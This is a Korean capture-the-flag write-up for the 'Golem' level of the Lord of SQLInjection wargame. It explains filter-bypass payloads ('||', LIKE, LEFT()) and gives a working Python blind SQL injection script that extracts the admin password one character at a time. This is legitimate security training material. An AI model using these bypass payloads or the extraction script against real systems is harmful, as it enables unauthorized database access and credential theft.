[Lord of SQLInjection] Golem Write UP

이번 문제는 Orge 문제와 유사한 문제이다. 하지만 좀 더 강력한 필터링이 걸어져 있었다.
prob, _, ., (), or, and, substr(, =이 필터링이 걸어져 있었고, 거기에 addslashes 함수로 특정 특수문자를 사용 못하게 치환하였다.

 

내가 SQL Injection에 사용하는 문자열들은 or, LENGTH(pw)=, SUBSTR(PW, 1, 1)=이 있다.
필터링에 걸리는 것은 or, SUBSTR(, =이 걸린다. 이것을 우회하려면 ||, LIKE로 우회가 가능하다.
하지만 SUBSTR 함수는 우회 방법이 없어서 다른 함수를 사용해야할 것 같았다.

 

일단 pw의 길이를 구해보겠다.

 

Orc 문제처럼 admin의 pw가 여러 개는 아닌 듯 하다.
admin의 pw 길이는 8개이며, guest의 pw 길이는 15개이다.

 

길이를 구했으니, pw를 구해보겠다.

SUBSTR 함수를 쓰지 못하니, 다른 함수를 사용하여 pw를 구해야한다.

 

내가 아는 방법은 2가지 방법이 있다.
RIGHT(), LEFT()와 HEX 값 비교가 있다.

 

RIGHT()와 LEFT 함수는 문자열의 오른쪽/왼쪽을 일정 수치까지 자르는 함수이다.
HEX 값 비교는 pw의 HEX값과 비교하여 pw를 찾아내는 방법이다. (pw > 0x000000001)

 

일단 RIGHT(), LEFT()를 이용하여 admin의 pw를 구해보겠다.

import requests, string, itertools

url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php'
headers = {'Cookie': 'PHPSESSID=387q85iillkptgef221pqbpg9t'}

def pwParser():
    result = ''
    for num in range(1, 8+1):
        for s in string.ascii_lowercase + string.digits + string.punctuation:
            parameter = f"?pw='||LEFT(pw, {num}) LIKE '{result + s}"
            res = requests.get(url + parameter, headers=headers)

            if 'Hello admin' in res.text:
                print(f'pw의 {num}번째 값 >>>>', s, hex(ord(s)))
                result += s
                break

    print(result)

pwParser()

손쉽게 구할 수 있었다.

 

구해진 pw 값을 보내주면 클리어하는 모습을 볼 수 있다.

 

하지만 여기서 끝나면 재미가 없다.
나는 두번째 방법인 HEX 값 비교를 통해 guest의 pw 값을 알아내려고 했지만, 시간이 많이 걸려서 가능한지만 보여주겠다.

이처럼 HEX값을 비교하여 True가 나오면 Guest로 로그인이 되는 것을 볼 수 있다.